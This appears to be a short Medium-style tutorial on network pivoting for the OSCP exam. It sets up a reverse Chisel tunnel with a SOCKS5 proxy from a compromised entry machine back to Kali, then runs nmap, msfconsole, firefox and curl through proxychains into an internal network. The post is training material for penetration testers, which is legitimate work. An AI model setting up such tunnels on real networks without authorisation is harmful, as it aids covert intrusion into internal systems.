Pivoting OSCP: Chisel & Proxychains

YevhSec1
Nov 8, 2021

Preconditions:

  • Install Proxychains
  • Install and compile Chisel
  • Copy compiled Chisel binary to the entry point machine

1)From Kali:

./chisel server -p 8000 -reverse

2)From client:

./chisel client <Your_Kali_IP>:8000 R:8001:127.0.0.1:1337

./chisel server -p 1337 — socks5

3)From Kali:

./chisel client 127.0.0.1:8001 socks

4)From Kali

sudo nano /etc/proxychains.conf

Enable #quiet_mode

socks5 127.0.0.1 1080

5)From Kali

proxychains nmap …

proxychains msfconsole

proxychains firefox

For example,

proxychains curl http://IP_In_Internal_Network

Follow me and stay secure!

--

--

YevhSec1

MSc in Cyber Security, OSCP, eWPTXv2, CEH Master. Awarded by Apple, Trello, Paysera..